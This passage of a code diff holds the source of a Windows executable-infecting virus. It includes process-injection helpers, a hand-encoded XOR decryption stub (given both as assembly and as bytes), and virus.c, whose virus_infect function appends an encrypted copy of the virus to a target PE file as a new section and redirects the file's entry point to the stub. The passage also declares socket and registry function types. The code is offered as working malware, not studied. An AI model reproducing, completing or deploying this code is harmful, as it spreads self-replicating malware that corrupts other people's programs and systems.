uint32_t fileSz;
|
||||
} file_data;
|
||||
|
||||
//ends with 0x00 struct
|
||||
typedef struct __DIR_LIST {
|
||||
char *fName;
|
||||
int fNameLen;
|
||||
FILETIME accessTime;
|
||||
FILETIME writeTime;
|
||||
char isDir; //either 1 == True or 0 == False;
|
||||
struct __DIR_LIST *next;
|
||||
} dir_list;
|
||||
|
||||
|
||||
#define FILE_ATTRIBUTE_DIRECTORY 0x10
|
||||
#define INVALID_HANDLE_VALUE -1
|
||||
|
||||
//process manipulation
|
||||
//ends with 0x00 struct
|
||||
typedef struct _PIDS {
|
||||
uint32_t pid;
|
||||
char *fName;
|
||||
struct _PIDS *next;
|
||||
} pids;
|
||||
|
||||
typedef struct _PROC_INJECTION {
|
||||
void *mem;
|
||||
size_t memSz;
|
||||
void *proc;
|
||||
} proc_injection;
|
||||
|
||||
typedef struct _STARTUPINFOA {
|
||||
uint32_t cb;
|
||||
char *reserved;
|
||||
char *desktop;
|
||||
char *title;
|
||||
uint32_t dwX;
|
||||
uint32_t dwY;
|
||||
uint32_t dwXSize;
|
||||
uint32_t dwYSize;
|
||||
uint32_t dwXCountChars;
|
||||
uint32_t dwYCountChars;
|
||||
uint32_t dwFileAttribute;
|
||||
uint32_t dwFlags;
|
||||
uint16_t wShowWindow;
|
||||
uint16_t cbReserved2;
|
||||
char *lpReserved2;
|
||||
void *hStdInput;
|
||||
void *hStdOutput;
|
||||
void *hStdError;
|
||||
} STARTUPINFOA;
|
||||
|
||||
typedef struct _PROCESS_INFORMATION {
|
||||
void *hProcess;
|
||||
void *hThread;
|
||||
uint32_t dwProcessId;
|
||||
uint32_t dwThreadId;
|
||||
} PROCESS_INFORMATION;
|
||||
|
||||
//the actual functions
|
||||
|
||||
|
||||
int pic_gen_random(int max);
|
||||
|
||||
int pic_strlen(const char *str);
|
||||
//the strcmp r either 1 (unequal) or 0 (equal)
|
||||
int pic_strncmp(const char *str1, const char *str2, int len);
|
||||
int pic_strcmp(const char *str1, const char *str2);
|
||||
void *pic_memmem(const void *haystack, size_t haystackLen,
|
||||
const void *needle, size_t needleLen);
|
||||
void *pic_memcpy(void *dst, const void *src, size_t n);
|
||||
void *pic_memset(void *dst, int c, size_t n);
|
||||
//this strcat works different in the way that it returns a new string
|
||||
//on allocated memory (allocated with pic_malloc())
|
||||
char *pic_strcat(char *str1, const char *str2);
|
||||
char *pic_strstr(char *haystack, char *needle);
|
||||
int ascii_ucode_find(char *ascii, char *ucode, int len);
|
||||
int message_box(char *text);
|
||||
void *pic_malloc(size_t size);
|
||||
void pic_free(void *mem);
|
||||
|
||||
void *pic_open_file(char *fname, unsigned int flags);
|
||||
int pic_close_handle(void *handle);
|
||||
char *pic_read_file_bin(char *fname, file_data *fileDat);
|
||||
int pic_write_file_bin(char *fname, file_data *fileDat);
|
||||
dir_list *list_windows_files(char *path);
|
||||
dir_list *pic_get_devices();
|
||||
void dir_list_append(dir_list *main, dir_list *toAppend);
|
||||
//get_paths() returned list contains "." and "..". I was too lazy sry :S
|
||||
dir_list *get_paths(char *root);
|
||||
dir_list *get_exe_paths(char *root);
|
||||
void pic_free_dir_list(dir_list *lst);
|
||||
void *pic_create_thread(void *attr, size_t stackSz, void *startFunc,
|
||||
void *param, uint32_t flags, uint32_t *id);
|
||||
|
||||
|
||||
//process manipulation
|
||||
int pic_create_proc(char *name);
|
||||
void *pic_open_proc(uint32_t perms, int inherit, uint32_t pid);
|
||||
pids *pic_enum_procs();
|
||||
void pic_enum_procs_free(pids *p);
|
||||
//the returned pointer needs to be freed
|
||||
char *pic_get_proc_file_name(uint32_t pid);
|
||||
void *pic_virtual_alloc_ex(void *proc, /*opt*/void *startAddr,
|
||||
size_t sz, uint32_t allocType, uint32_t protect);
|
||||
int pic_virtual_free_ex(void *proc, void *addr, size_t sz, uint32_t type);
|
||||
int pic_write_proc_mem(void *proc, void *destAddr,
|
||||
void *srcBuf, size_t sz, size_t *szWritten);
|
||||
proc_injection *pic_inject_into_proc(void *proc, void *data,
|
||||
size_t dataSz);
|
||||
void pic_inject_into_proc_free(proc_injection *pi);
|
||||
void *pic_create_remote_thread(void *proc, void *secAttrs,
|
||||
size_t stackSz, void *entry,
|
||||
void *param, uint32_t flags, uint32_t *tid);
|
||||
|
||||
|
||||
//system information
|
||||
|
||||
//returns the windows directory in a string
|
||||
//(you have to pic_free() it when you don't need it anymore)
|
||||
char *pic_get_windows_directory();
|
||||
|
||||
|
||||
//errors:
|
||||
uint32_t pic_get_last_error();
|
||||
|
||||
|
||||
|
||||
//some flags we need they are usually defined somewhere in the windows
|
||||
//headers but since we don't want to be depended on them we put
|
||||
//the defines here:
|
||||
|
||||
//process access rights
|
||||
#define PROCESS_CREATE_PROCESS 0x80
|
||||
#define PROCESS_CREATE_THREAD 0x2
|
||||
#define PROCESS_DUP_HANDLE 0x40
|
||||
#define PROCESS_QUERY_INFORMATION 0x400
|
||||
#define PROCESS_QUERY_LIMITED_INFORMATION 0x1000
|
||||
#define PROCESS_SET_INFORMATION 0x200
|
||||
#define PROCESS_SET_QUOTA 0x100
|
||||
#define PROCESS_SUSPEND_RESUME 0x800
|
||||
#define PROCESS_TERMINATE 0x1
|
||||
#define PROCESS_VM_OPERATION 0x8
|
||||
#define PROCESS_VM_READ 0x10
|
||||
#define PROCESS_VM_WRITE 0x20
|
||||
#define SYNCRONIZE 0x100000
|
||||
|
||||
//memory access rights
|
||||
#define PAGE_NOACCESS 0x01
|
||||
#define PAGE_READONLY 0x02
|
||||
#define PAGE_READWRITE 0x04
|
||||
#define PAGE_WRITECOPY 0x08
|
||||
#define PAGE_EXECUTE 0x10
|
||||
#define PAGE_EXECUTE_READ 0x20
|
||||
#define PAGE_EXECUTE_READWRITE 0x40
|
||||
#define PAGE_EXECUTE_WRITECOPY 0x80
|
||||
#define PAGE_GUARD 0x100
|
||||
#define PAGE_NOCACHE 0x200
|
||||
#define PAGE_WRITECOMBINE 0x400
|
||||
#define MEM_COMMIT 0x1000
|
||||
#define MEM_RESERVE 0x2000
|
||||
#define MEM_DECOMMIT 0x4000
|
||||
#define MEM_RELEASE 0x8000
|
||||
#define MEM_FREE 0x10000
|
||||
#define MEM_PRIVATE 0x20000
|
||||
#define MEM_MAPPED 0x40000
|
||||
#define MEM_RESET 0x80000
|
||||
#define MEM_TOP_DOWN 0x100000
|
||||
#define MEM_WRITE_WATCH 0x200000
|
||||
#define MEM_PHYSICAL 0x400000
|
||||
#define MEM_ROTATE 0x800000
|
||||
#define MEM_LARGE_PAGES 0x20000000
|
||||
#define MEM_4MB_PAGES 0x80000000
|
||||
#define SEC_FILE 0x800000
|
||||
#define SEC_IMAGE 0x1000000
|
||||
#define SEC_PROTECTED_IMAGE 0x2000000
|
||||
#define SEC_RESERVE 0x4000000
|
||||
#define SEC_COMMIT 0x8000000
|
||||
#define SEC_NOCACHE 0x10000000
|
||||
#define SEC_WRITECOMBINE 0x40000000
|
||||
#define SEC_LARGE_PAGES 0x80000000
|
||||
|
||||
#endif
|
|
@ -0,0 +1,35 @@
|
|||
bits 32
|
||||
|
||||
mov esi, 0x55555555 ;rva to data
|
||||
mov ebx, 0x66666666 ;dataSz
|
||||
mov ecx, 0x00 ;dataCounter
|
||||
mov edi, 0x77777777 ;rva to key
|
||||
mov edx, 0x00 ;keyCounter
|
||||
|
||||
mov eax, [fs:0x30]
|
||||
mov eax, [eax+0x08] ;imageBase
|
||||
add esi, eax
|
||||
add edi, eax
|
||||
push eax
|
||||
|
||||
s:
|
||||
cmp ecx, ebx
|
||||
je end
|
||||
mov al, [esi+ecx]
|
||||
xor al, [edi+edx]
|
||||
mov [esi+ecx], al
|
||||
inc ecx
|
||||
inc edx
|
||||
mov al, [edi+edx]
|
||||
cmp al, 0x00
|
||||
je zeroKeyCnt
|
||||
jmp s
|
||||
zeroKeyCnt:
|
||||
xor edx, edx
|
||||
jmp s
|
||||
|
||||
end:
|
||||
mov ecx, 0x99999999 ;rva entry
|
||||
pop eax
|
||||
add eax, ecx
|
||||
jmp eax
|
|
@ -0,0 +1,5 @@
|
|||
int main(void) {
|
||||
int i = 0;
|
||||
while (1) i++;
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,363 @@
|
|||
#include "virus.h"
|
||||
|
||||
static void *virus_encrypt(void *image, void *vir,
|
||||
uint32_t virSz, char *key);
|
||||
static void *virus_add_dec_stub(void *image, uint32_t rvaData,
|
||||
uint32_t dataSz, uint32_t rvaKey,
|
||||
uint32_t rvaEntry);
|
||||
void virus_get_pointers(virus_pointers *vptrs) {
|
||||
vptrs->virusStart = start(); //aaa.c
|
||||
vptrs->virusEnd = end(); //zzz.c
|
||||
vptrs->virusSz = (vptrs->virusEnd - vptrs->virusStart);
|
||||
vptrs->virusEntry = virus_loader();
|
||||
vptrs->virusBase = get_peb_data(1);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
void *virus_encrypt(void *image, void *vir,
|
||||
uint32_t virSz, char *key)
|
||||
{
|
||||
int virCnt, keyCnt = 0;
|
||||
char *secName;
|
||||
void *writePtr;
|
||||
|
||||
for (virCnt = 0; virCnt < virSz; virCnt++) {
|
||||
((char*)vir)[virCnt] ^= ((char*)key)[keyCnt];
|
||||
keyCnt++;
|
||||
if (((char*)key)[keyCnt] == '\x00') keyCnt = 0;
|
||||
}
|
||||
for (int i = 0; i < 16; i++) {
|
||||
secName = sections_by_index_get_name(image, i);
|
||||
if (NULL == secName) return NULL; //we found no exe section
|
||||
if (1 == sections_by_name_is_readable(image, secName)) {
|
||||
writePtr = sections_by_name_enlarge(image, secName,
|
||||
key, (pic_strlen(key)+1));
|
||||
if (NULL != writePtr) return writePtr;
|
||||
}
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
void *virus_add_dec_stub(void *image, uint32_t rvaData,
|
||||
uint32_t dataSz, uint32_t rvaKey,
|
||||
uint32_t rvaEntry)
|
||||
{
|
||||
uint32_t checkCnt;
|
||||
uint32_t *writePtr;
|
||||
char *secName;
|
||||
char stub[77];
|
||||
stub[0] = '\xbe'; stub[1] = '\x55'; stub[2] = '\x55'; stub[3] = '\x55';
|
||||
stub[4] = '\x55'; stub[5] = '\xbb'; stub[6] = '\x66'; stub[7] = '\x66';
|
||||
stub[8] = '\x66'; stub[9] = '\x66'; stub[10] = '\xb9'; stub[11] = '\x0';
|
||||
stub[12] = '\x0'; stub[13] = '\x0'; stub[14] = '\x0'; stub[15] = '\xbf';
|
||||
stub[16] = '\x77'; stub[17] = '\x77'; stub[18] = '\x77'; stub[19] = '\x77';
|
||||
stub[20] = '\xba'; stub[21] = '\x0'; stub[22] = '\x0'; stub[23] = '\x0';
|
||||
stub[24] = '\x0'; stub[25] = '\x64'; stub[26] = '\xa1'; stub[27] = '\x30';
|
||||
stub[28] = '\x0'; stub[29] = '\x0'; stub[30] = '\x0'; stub[31] = '\x8b';
|
||||
stub[32] = '\x40'; stub[33] = '\x8'; stub[34] = '\x1'; stub[35] = '\xc6';
|
||||
stub[36] = '\x1'; stub[37] = '\xc7'; stub[38] = '\x50'; stub[39] = '\x39';
|
||||
stub[40] = '\xd9'; stub[41] = '\x74'; stub[42] = '\x18'; stub[43] = '\x8a';
|
||||
stub[44] = '\x4'; stub[45] = '\xe'; stub[46] = '\x32'; stub[47] = '\x4';
|
||||
stub[48] = '\x17'; stub[49] = '\x88'; stub[50] = '\x4'; stub[51] = '\xe';
|
||||
stub[52] = '\x41'; stub[53] = '\x42'; stub[54] = '\x8a'; stub[55] = '\x4';
|
||||
stub[56] = '\x17'; stub[57] = '\x3c'; stub[58] = '\x0'; stub[59] = '\x74';
|
||||
stub[60] = '\x2'; stub[61] = '\xeb'; stub[62] = '\xe8'; stub[63] = '\x31';
|
||||
stub[64] = '\xd2'; stub[65] = '\xeb'; stub[66] = '\xe4'; stub[67] = '\xb9';
|
||||
stub[68] = '\x99'; stub[69] = '\x99'; stub[70] = '\x99'; stub[71] = '\x99';
|
||||
stub[72] = '\x58'; stub[73] = '\x1'; stub[74] = '\xc8'; stub[75] = '\xff';
|
||||
stub[76] = '\xe0';
|
||||
|
||||
checkCnt = 0;
|
||||
for (int i = 0; i < STUB_LEN; i++) {
|
||||
writePtr = (uint32_t*)&((char*)stub)[i];
|
||||
if ((*writePtr) == 0x55555555) {
|
||||
(*writePtr) = rvaData;
|
||||
checkCnt++;
|
||||
}
|
||||
if ((*writePtr) == 0x66666666) {
|
||||
(*writePtr) = dataSz;
|
||||
checkCnt++;
|
||||
}
|
||||
if ((*writePtr) == 0x77777777) {
|
||||
(*writePtr) = rvaKey;
|
||||
checkCnt++;
|
||||
}
|
||||
if ((*writePtr) == 0x99999999) {
|
||||
(*writePtr) = rvaEntry;
|
||||
checkCnt++;
|
||||
}
|
||||
}
|
||||
//of cause this is useless untill we have changing stubs...
|
||||
if (checkCnt != 0x04) return NULL;
|
||||
|
||||
for (int i = 0; i < 16; i++) {
|
||||
secName = sections_by_index_get_name(image, i);
|
||||
if (NULL == secName) return NULL; //we found no exe section
|
||||
if (1 == sections_by_name_is_executable(image, secName)) {
|
||||
writePtr = sections_by_name_enlarge(image, secName,
|
||||
stub, STUB_LEN);
|
||||
if (NULL != writePtr) return writePtr;
|
||||
}
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
int virus_check_for_section(char *file, char *secName) {
|
||||
char *nPtr;
|
||||
int i = 0;
|
||||
while (nPtr = sections_by_index_get_sh(file, i)) {
|
||||
if (pic_strncmp(secName, nPtr, 8) == 0) {
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
int virus_check_for_infection(char *file) {
|
||||
char *sName;
|
||||
int i = 0;
|
||||
|
||||
while (sName = sections_by_index_get_name(file, i)) {
|
||||
if (sections_by_name_is_writable(file, sName)
|
||||
&& sections_by_name_is_executable(file, sName)) {
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
//This function needs to be improved a bit but it should work for now.
|
||||
//One important thing is checking for reading and writing permissions
|
||||
//before infection.
|
||||
int virus_infect(char *path, char *secName, uint32_t secFlags) {
|
||||
file_data fdat, nfdat;
|
||||
virus_pointers vptrs;
|
||||
void *oldRvaPhldr, *newSec, *epRva;
|
||||
hdrs peNewHdrs, peOldHdrs;
|
||||
uint32_t oldEpRva, oldEpPhldr = 0x44444444;
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
char key[3], *keyPtr;
|
||||
int i;
|
||||
|
||||
key[0] = 'a';
|
||||
key[1] = 'b';
|
||||
key[2] = '\x00';
|
||||
|
||||
virus_get_pointers(&vptrs);
|
||||
|
||||
if (NULL == pic_read_file_bin(path, &fdat)) return -1;
|
||||
if (virus_check_for_section(fdat.data, secName)) {
|
||||
pic_free(fdat.data);
|
||||
return -1;
|
||||
}
|
||||
if (virus_check_for_infection(fdat.data)) {
|
||||
pic_free(fdat.data);
|
||||
return -1;
|
||||
}
|
||||
nfdat.fileSz = sections_get_sizeof_image_after_add_section(fdat.data,
|
||||
fdat.fileSz,
|
||||
vptrs.virusSz);
|
||||
nfdat.data = pic_malloc(nfdat.fileSz);
|
||||
newSec = sections_add_section(fdat.data, fdat.fileSz,
|
||||
nfdat.data, nfdat.fileSz,
|
||||
secName, vptrs.virusSz);
|
||||
pic_memcpy(newSec, vptrs.virusStart, vptrs.virusSz);
|
||||
sections_by_name_set_characteristics(nfdat.data, secName, secFlags);
|
||||
|
||||
/* since vptrs->virusEntry points on the currently running exe
|
||||
we need to calculate the entry point of the new executable */
|
||||
epRva = vptrs.virusEntry;
|
||||
epRva -= vptrs.virusStart;
|
||||
|
||||
//epRva is now just the offset from the section start
|
||||
hdrs_init(&peNewHdrs, nfdat.data);
|
||||
|
||||
//FIXME: just until the 64bit version is ready
|
||||
if (peNewHdrs.type == 64) {
|
||||
pic_free(nfdat.data);
|
||||
pic_free(fdat.data);
|
||||
return -1;
|
||||
}
|
||||
sh = sections_by_name_get_sh(nfdat.data, secName);
|
||||
epRva += sh->VirtualAddress;
|
||||
//we will use oldEPRva later.
|
||||
oldEpRva = hdrs_get_address_of_entry_point(&peNewHdrs);
|
||||
hdrs_set_address_of_entry_point(&peNewHdrs,
|
||||
(uint32_t)epRva);
|
||||
hdrs_destroy(&peNewHdrs);
|
||||
pic_free(fdat.data);
|
||||
/* In the below snippet we hope there is no other 44444444
|
||||
byte series in the scanned bytes. If that would be the case
|
||||
the code might brake the new executable. */
|
||||
uint8_t byteBeforeSig = 0x00;
|
||||
i = 0;
|
||||
do {
|
||||
oldRvaPhldr = pic_memmem(newSec, vptrs.virusSz,
|
||||
&oldEpPhldr, sizeof (uint32_t));
|
||||
if (NULL != oldRvaPhldr) {
|
||||
pic_memcpy(oldRvaPhldr, &oldEpRva, sizeof (uint32_t));
|
||||
i++;
|
||||
}
|
||||
} while (NULL != oldRvaPhldr);
|
||||
if (2 != i) {
|
||||
//something went wrong with the 44444444 searching stuff
|
||||
pic_free(nfdat.data);
|
||||
return -1;
|
||||
}
|
||||
|
||||
hdrs_init(&peNewHdrs, nfdat.data);
|
||||
keyPtr = virus_encrypt(nfdat.data, newSec, vptrs.virusSz, key);
|
||||
keyPtr = virus_add_dec_stub(nfdat.data, ptr_to_rva(nfdat.data, newSec),
|
||||
vptrs.virusSz,
|
||||
ptr_to_rva(nfdat.data, keyPtr),
|
||||
hdrs_get_address_of_entry_point(&peNewHdrs));
|
||||
virus_sign_infected(nfdat.data, STUB_LEN);
|
||||
hdrs_set_address_of_entry_point(&peNewHdrs, ptr_to_rva(nfdat.data,
|
||||
keyPtr));
|
||||
|
||||
|
||||
hdrs_destroy(&peNewHdrs);
|
||||
if (NULL == pic_write_file_bin(path, &nfdat)) {
|
||||
pic_free(nfdat.data);
|
||||
return -1;
|
||||
}
|
||||
pic_free(nfdat.data);
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
|
||||
/* This function checks its return address whether it
|
||||
is whithin the section of the virus or not.
|
||||
If it is called by the virus it will return its start address
|
||||
if not it will call the main function. */
|
||||
void *virus_loader() {
|
||||
void *retAddr;
|
||||
void *ownAddr;
|
||||
int64_t offset;
|
||||
|
||||
__asm__("call nextIns;\r\n"
|
||||
"nextIns:\r\n"
|
||||
"pop %0;\r\n"
|
||||
: "=r" (ownAddr)
|
||||
:
|
||||
:);
|
||||
ownAddr -= 0x0b;
|
||||
|
||||
#ifdef __amd64__
|
||||
__asm__(".intel_syntax;\r\n"
|
||||
"mov %0, [rbp+0x08];\r\n" //return address;
|
||||
".att_syntax;\r\n"
|
||||
: "=r" (retAddr)
|
||||
:
|
||||
:);
|
||||
#else
|
||||
__asm__(".intel_syntax;\r\n"
|
||||
"mov %0, [ebp+0x04];\r\n" //return address;
|
||||
".att_syntax;\r\n"
|
||||
: "=r" (retAddr)
|
||||
:
|
||||
:);
|
||||
#endif
|
||||
|
||||
offset = (int64_t)(ownAddr - retAddr); //this is very hacky since
|
||||
//the function will not work
|
||||
//if it's called from a function
|
||||
//which lies behind this one
|
||||
if (offset < 0x1000 && offset > 0) return ownAddr;
|
||||
main();
|
||||
#ifdef __amd64__
|
||||
__asm__(".intel_syntax;\r\n"
|
||||
"mov rax, %0\r\n"
|
||||
"add eax, 0x44444444\r\n"
|
||||
"jmp rax\r\n"
|
||||
".att_syntax\r\n"
|
||||
:
|
||||
:"r"(get_peb_data(1))
|
||||
:);
|
||||
#else
|
||||
__asm__(".intel_syntax;\r\n"
|
||||
"mov eax, %0\r\n"
|
||||
"add eax, 0x44444444\r\n"
|
||||
"jmp eax\r\n"
|
||||
".att_syntax\r\n"
|
||||
:
|
||||
:"r"(get_peb_data(1))
|
||||
:);
|
||||
#endif
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/* returns:
|
||||
* -1 : error
|
||||
* 1-100 : likelyhood of infection
|
||||
*/
|
||||
int virus_check_infected(infect_info *ii, char *path, uint32_t stubSz) {
|
||||
file_data fdat;
|
||||
hdrs h;
|
||||
virus_pointers vptrs;
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
uint32_t numSecs;
|
||||
void *of;
|
||||
|
||||
virus_get_pointers(&vptrs);
|
||||
if (NULL == pic_read_file_bin(path, &fdat)
|
||||
|| NULL == (of = pic_open_file(path, 0x02 /*READWRITE*/))) {
|
||||
pic_memset(ii, 0, sizeof (infect_info));
|
||||
return -1;
|
||||
}
|
||||
pic_close_handle(of);
|
||||
|
||||
if (-1 == hdrs_init(&h, fdat.data)) return -1;
|
||||
numSecs = hdrs_get_number_of_sections(&h);
|
||||
if (16 < numSecs) return -1;
|
||||
ii->numSecs = numSecs;
|
||||
ii->infLike = 1;
|
||||
for (int i = 0; i < numSecs; i++) {
|
||||
sh = sections_by_index_get_sh(fdat.data, i);
|
||||
ii->secs[i].freeSpace = sh->SizeOfRawData;
|
||||
ii->secs[i].freeSpace -= sh->Misc.VirtualSize;
|
||||
pic_memcpy(ii->secs[i].name, sh->Name, 8);
|
||||
ii->secs[i].exe = sections_by_name_is_executable(fdat.data,
|
||||
sh->Name);
|
||||
ii->secs[i].read = sections_by_name_is_readable(fdat.data,
|
||||
sh->Name);
|
||||
ii->secs[i].write = sections_by_name_is_writable(fdat.data,
|
||||
sh->Name);
|
||||
if (ii->secs[i].exe && (ii->secs[i].freeSpace > stubSz))
|
||||
ii->infLike = 0;
|
||||
}
|
||||
return ii->infLike;
|
||||
}
|
||||
|
||||
//checks if a binary (scanned with check_infected) has a section with
|
||||
//the given name (1 = it has; 0 = it hasn't)
|
||||
int virus_check_for_name_in_sections(infect_info *ii, char *name) {
|
||||
section *secCur;
|
||||
|
||||
secCur = ii->secs;
|
||||
for (int i = 0; i < ii->numSecs; i++) {
|
||||
if (!pic_strncmp(secCur[i].name, name, 8)) return 1;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
void virus_sign_infected(char *img, uint32_t stubSz) {
|
||||
uint32_t numSecs;
|
||||
hdrs h;
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
hdrs_init(&h, img);
|
||||
numSecs = hdrs_get_number_of_sections(&h);
|
||||
hdrs_destroy(&h);
|
||||
for (int i = 0; i < numSecs; i++) {
|
||||
sh = sections_by_index_get_sh(img, i);
|
||||
if (sh->Characteristics & IMAGE_SCN_MEM_EXECUTE) {
|
||||
while (stubSz <= (sh->SizeOfRawData - sh->Misc.VirtualSize))
|
||||
sh->Misc.VirtualSize += stubSz;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -0,0 +1,38 @@
|
|||
#include "stdfuncs.h"
|
||||
#include "aaa.h"
|
||||
#include "zzz.h"
|
||||
#include "pic-peter/peter.h"
|
||||
#include "peb.h"
|
||||
|
||||
#define STUB_LEN 77
|
||||
|
||||
typedef struct _VPTRS {
|
||||
void *virusStart;
|
||||
void *virusEnd;
|
||||
int32_t virusSz;
|
||||
void *virusEntry;
|
||||
void *virusBase;
|
||||
} virus_pointers;
|
||||
|
||||
typedef struct {
|
||||
char exe;
|
||||
char read;
|
||||
char write;
|
||||
char name[8];
|
||||
uint32_t freeSpace;
|
||||
} section;
|
||||
|
||||
typedef struct {
|
||||
section secs[16];
|
||||
uint32_t numSecs;
|
||||
char infLike; //the higher the value
|
||||
//the more likely is an infection
|
||||
} infect_info;
|
||||
|
||||
void *virus_loader();
|
||||
int virus_infect(char *path, char *secName, uint32_t secFlags);
|
||||
void virus_get_pointers(virus_pointers *vptrs);
|
||||
int virus_check_infected(infect_info *ii,
|
||||
char *path, uint32_t stubSz);
|
||||
void virus_sign_infected(char *img, uint32_t stubSz);
|
||||
int virus_check_for_name_in_sections(infect_info *ii, char *name);
|
|
@ -0,0 +1,177 @@
|
|||
#ifndef WINFUNCS
|
||||
#define WINFUNCS
|
||||
#include <stdint.h>
|
||||
#include <stddef.h>
|
||||
|
||||
#if defined(__amd64__)
|
||||
typedef void (*srandd)(unsigned int *)__attribute__((ms_abi));
|
||||
|
||||
typedef int (*randd)()__attribute__((ms_abi));
|
||||
|
||||
typedef int (*timee)(int *)__attribute__((ms_abi));
|
||||
|
||||
typedef void *(*get_proc_heap)()__attribute__((ms_abi));
|
||||
|
||||
typedef void *(*heap_alloc)(void *heap, uint32_t flags, size_t size)__attribute__((msabi));
|
||||
|
||||
typedef void *(*heap_free)(void *heap, uint32_t flags, void *mem)__attribute__((msabi));
|
||||
|
||||
typedef int (*msg_box)(void *window, char *text, char *caption, unsigned int type)__attribute__((msabi));
|
||||
|
||||
typedef void *(*open_file)(char *name, void *ofStruct, unsigned int style)__attribute__((msabi));
|
||||
|
||||
typedef int (*read_file)(void *handle, void *buffer, uint32_t nrBytesToRead, uint32_t *nrBytesRead, void *overlapped)__attribute__((ms_abi));
|
||||
|
||||
typedef int (*close_handle)(void *handle)__attribute__((ms_abi));
|
||||
|
||||
typedef int (*write_file) (void *handle, char *buffer, uint32_t nrBytesToWrite, uint32_t *ntBytesWritten, void *overlapped)__attribute__((ms_abi));
|
||||
|
||||
typedef void *(*find_first_file)(char *path, void *find_data)__attribute__((ms_abi));
|
||||
|
||||
typedef void *(*find_next_file)(void *handle, void *find_data)__attribute__((ms_abi));
|
||||
|
||||
typedef int (*find_close)(void *handle)__attribute__((ms_abi));
|
||||
|
||||
typedef uint32_t (*get_logical_drive_strings)(uint32_t len, char *buffer)__attribute__((ms_abi));
|
||||
|
||||
typedef unsigned int (*get_windows_directory)(char *buffer, unsigned int size)__attribute__((ms_abi));
|
||||
|
||||
typedef void *(*create_thread)(void *attributes, size_t stackSz, void *startFunc, void *param, uint32_t flags, uint32_t *id)__attribute__((ms_abi));
|
||||
|
||||
//process manipulation
|
||||
typedef int (*create_process)(char *app, char *cmd, void *secAttr, void *threadAttr, int inheritHandle, uint32_t creationFlags, void *env, char *currentDir, void *startupInfo, void *procInfo)__attribute__((ms_abi));
|
||||
|
||||
typedef void *(*open_process)(uint32_t perms, int inherit, uint32_t pid)__attribute__((ms_abi));
|
||||
|
||||
typedef int (*enum_processes)(uint32_t *procs, uint32_t sz, uint32_t *retSz)__attribute__((ms_abi));
|
||||
|
||||
typedef uint32_t (*get_module_filename_ex)(void *proc, void *mod, char *buf, uint32_t bufSz)__attribute__((msabi));
|
||||
|
||||
typedef void *(*virtual_alloc_ex)(void *proc, /*opt*/void *startAddr, size_t sz, uint32_t allocType, uint32_t protect)__attribute__((msabi));
|
||||
|
||||
typedef int (*virtual_free_ex)(void *proc, void *addr, size_t sz, uint32_t type)__attribute__((msabi));
|
||||
|
||||
typedef int (*write_process_memory)(void *proc, void *destAddr, void *srcBuf, size_t sz, size_t *szWritten)__attribute__((msabi));
|
||||
|
||||
typedef void *(*create_remote_thread)(void *proc, void *secAttrs, size_t stackSz, void *entry, void *param, uint32_t flags, uint32_t *tid)__attribute__((msabi));
|
||||
|
||||
//sockets
|
||||
|
||||
typedef int (*wsa_startup)(uint16_t, void *)__attribute__((msabi));
|
||||
|
||||
typedef int (*fp_socket)(int af, int type, int proto)__attribute__((msabi));
|
||||
|
||||
//void = sockaddr
|
||||
typedef int (*fp_connect)(int sock, void *name, int nameLen)__attribute__((msabi));
|
||||
|
||||
typedef int (*wsa_cleanup)(void)__attribute__((msabi));
|
||||
|
||||
typedef int (*fp_send)(int sock, const char *buf, int len, int flags)__attribute__((msabi));
|
||||
|
||||
typedef int (*fp_recv)(int sock, char *buf, int len, int flags)__attribute__((msabi));
|
||||
|
||||
typedef int (*s_close)(int sock)__attribute__((msabi));
|
||||
|
||||
|
||||
//registry:
|
||||
typedef long (*reg_open_key_ex_a)(void *hkey, char *subKey, uint32_t options, uint32_t samDesire, void **result)__attribute__((msabi));
|
||||
|
||||
typedef long (*reg_get_value_a)(void *hkey, char *subKey, char *value, uint32_t flags, uint32_t *type, void *data, uint32_t *dataSz)__attribute__((msabi));
|
||||
|
||||
typedef long (*reg_close_key)(void *hkey)__attribute__((msabi));
|
||||
|
||||
|
||||
//errors:
|
||||
typedef uint32_t (*get_last_error)()__attribute__((msabi));
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#else
|
||||
|
||||
|
||||
typedef void (*srandd)(unsigned int *)__attribute__((stdcall));
|
||||
|
||||
typedef int (*randd)()__attribute__((stdcall));
|
||||
|
||||
typedef int (*timee)(int *)__attribute__((stdcall));
|
||||
|
||||
|
||||
|
||||
typedef void *(*get_proc_heap)()__attribute__((stdcall));
|
||||
|
||||
typedef void *(*heap_alloc)(void *heap, uint32_t flags, size_t size)__attribute__((stdcall));
|
||||
|
||||
typedef void *(*heap_free)(void *heap, uint32_t flags, void *mem)__attribute__((stdcall));
|
||||
|
||||
typedef int (*msg_box)(void *window, char *text, char *caption, unsigned int type)__attribute__((stdcall));
|
||||
|
||||
typedef void *(*open_file)(char *name, void *ofStruct, unsigned int style)__attribute__((stdcall));
|
||||
|
||||
typedef int (*read_file)(void *handle, void *buffer, uint32_t nrBytesToRead, uint32_t *nrBytesRead, void *overlapped)__attribute__((stdcall));
|
||||
|
||||
typedef int (*close_handle)(void *handle)__attribute__((stdcall));
|
||||
|
||||
typedef int (*write_file) (void *handle, char *buffer, uint32_t nrBytesToWrite, uint32_t *ntBytesWritten, void *overlapped)__attribute__((stdcall));
|
||||
|
||||
typedef void *(*find_first_file)(char *path, void *find_data)__attribute__((stdcall));
|
||||
|
||||
typedef void *(*find_next_file)(void *handle, void *find_data)__attribute__((stdcall));
|
||||
|
||||
typedef int (*find_close)(void *handle)__attribute__((stdcall));
|
||||
|
||||
typedef uint32_t (*get_logical_drive_strings)(uint32_t len, char *buffer)__attribute__((stdcall));
|
||||
|
||||
typedef unsigned int (*get_windows_directory)(char *buffer, unsigned int size)__attribute__((stdcall));
|
||||
|
||||
